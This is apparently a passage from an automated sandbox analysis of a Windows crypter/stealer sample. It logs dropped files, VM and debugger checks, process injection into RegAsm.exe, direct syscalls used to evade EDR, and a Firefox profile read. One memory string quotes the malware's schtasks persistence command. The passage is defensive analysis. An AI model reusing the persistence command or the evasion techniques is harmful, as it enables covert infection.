                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\66ecb454d2b4a_lgfdsjgds[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-BEGLA.tmpJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-TS51E.tmpJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeDropped PE file which has not been started: C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exeJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeAPI coverage: 1.9 %
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe TID: 616Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe TID: 6060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5840Thread sleep count: 466 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5840Thread sleep time: -93200s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4712Thread sleep time: -300000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exe TID: 6436Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exe TID: 7332Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exe TID: 5728Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exe TID: 6512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exe TID: 1284Thread sleep count: 64 > 30Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exe TID: 6700Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe TID: 3608Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe TID: 1696Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exe TID: 4476Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6112Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7320Thread sleep time: -30000s >= -30000s
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe TID: 7412Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeLast function: Thread delayed
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\explorer.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00540905 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,3_2_00540905
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 300000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 300000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeThread delayed: delay time: 30000
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cache2\doomed\Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cache2\entries\Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cache2\Jump to behavior
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exeBinary or memory string: VMware
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000000.1791830844.0000000000887000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: memcpy after 1memcpy after 2memcpy after 3memcpy after 4memcpy after 5before zip stream oopenFailed to open zip streamzip entry open Failed to open zip entryFailed to read zip entryFailed to allocate memory%s/%sError opening fileError writing to fileopen /create /tn "ServiceData4" /tr "%s" /st 00:01 /du 9800:59 /sc once /ri 1 /fschtasks.exeCapCutVisual Studio Setup\ProfilesRoaming\Profiles\imloifkgjagghnncjkhggdhalmcnfklkContent-Type: multipart/form-data; boundary=----Boundary%luDriverPack Notifier.configPotPlayerMini64GRETECHwebview2BeamNG.driveSoftware Reporter ToolVMwareFree_PDF_SolutionsPanasonicProtectUserBenchmarkStreamingVideoProviderdiscordJackbox Gamescwd_globalDocker Desktop.dockerDocker1
                        Source: RegAsm.exe, 00000003.00000002.1830248913.000000000146E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: RegAsm.exe, 00000003.00000002.1830248913.000000000142A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                        Source: XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000002.2192250317.0000000005FD0000.00000004.08000000.00040000.00000000.sdmp, XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000002.2044194881.00000000047AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CYCFPXIEBATTBKHGFSELOVMGNCWKTKMDAPMJOG
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000002.2951750800.0000000001361000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeSystem information queried: CodeIntegrityInformationJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00553C90 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00553C90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00433130 mov eax, dword ptr fs:[00000030h]3_2_00433130
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00433130 mov eax, dword ptr fs:[00000030h]3_2_00433130
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_025F092B mov eax, dword ptr fs:[00000030h]9_2_025F092B
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_025F0D90 mov eax, dword ptr fs:[00000030h]9_2_025F0D90
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_0284FDD7 push dword ptr fs:[00000030h]9_2_0284FDD7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0050CCE0 lstrlenA,GetProcessHeap,HeapAlloc,lstrcpynA,3_2_0050CCE0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeProcess token adjusted: Debug
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0053FA25 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0053FA25
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00553C90 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00553C90
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00502F3D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00502F3D
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: Process Memory Space: Yt_9y5LuIpBZXKd9EiYluKkG.exe PID: 1280, type: MEMORYSTR
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3210000 protect: page execute and read and write
                        Contains functionality to inject code into remote processes
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeCode function: 6_2_024C21A5 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,6_2_024C21A5
                        Creates a thread in another existing process (thread injection)
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeThread created: C:\Windows\explorer.exe EIP: 2A619A8Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeThread created: unknown EIP: 70D9E4Jump to behavior
                        Found direct / indirect Syscall (likely to bypass EDR)
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtUnmapViewOfSection: Direct from: 0x140F9991A
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtProtectVirtualMemory: Direct from: 0x140FDE281
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtMapViewOfSection: Direct from: 0x140FB14BD
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtClose: Direct from: 0x1418EC263
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtProtectVirtualMemory: Direct from: 0x140FE97E9
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtOpenFile: Direct from: 0x1418ECD9A
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtProtectVirtualMemory: Direct from: 0x140FB7051
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtProtectVirtualMemory: Direct from: 0x1412C887B
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtProtectVirtualMemory: Direct from: 0x14101A9A5
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtProtectVirtualMemory: Direct from: 0x141027997
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtProtectVirtualMemory: Direct from: 0x14101399D
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtProtectVirtualMemory: Direct from: 0x1418ECF55
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtProtectVirtualMemory: Direct from: 0x140FE47B8
                        Source: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exeNtProtectVirtualMemory: Indirect: 0x140F85475
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeMemory written: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exe base: 6F0000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeMemory written: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3210000 value starts with: 4D5A
                        Maps a DLL or memory area into another process
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 56C000Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58B000Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 593000Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 5D9000Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F3E008Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A2C008Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 458000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10ED008Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: EA1008Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C53008
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3210000
                        Source: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3171008
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeProcess created: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe "C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe"Jump to behavior
